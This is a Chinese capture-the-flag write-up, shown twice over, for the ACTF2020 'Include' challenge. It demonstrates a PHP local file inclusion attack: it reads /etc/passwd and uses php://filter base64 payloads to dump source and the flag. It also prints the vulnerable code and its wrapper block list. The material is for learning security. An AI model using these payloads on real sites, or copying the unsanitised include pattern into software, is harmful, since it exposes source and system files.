[ACTF2020 新生赛]Include

打开链接发现tips url：/?file=flag.php

根据题目标题和hint猜测这应该是一道文件包含题。

尝试/?file=/etc/passwd包含成功！

尝试使用php read filter 读取index.php源码 /?file=php://filter/read=convert.base64-encode/resource=index.php

<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

读取flag.php得到flag /?file=php://filter/read=convert.base64-encode/resource=flag.php

上一页[MRCTF2020]Ez_bypass 下一页[GXYCTF2019]Ping Ping Ping

最后更新于3年前

这有帮助吗？

[ACTF2020 新生赛]Include

打开链接发现tips url：/?file=flag.php

根据题目标题和hint猜测这应该是一道文件包含题。

尝试/?file=/etc/passwd包含成功！

尝试使用php read filter 读取index.php源码 /?file=php://filter/read=convert.base64-encode/resource=index.php

<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

读取flag.php得到flag /?file=php://filter/read=convert.base64-encode/resource=flag.php

上一页[MRCTF2020]Ez_bypass 下一页[GXYCTF2019]Ping Ping Ping

最后更新于3年前

这有帮助吗？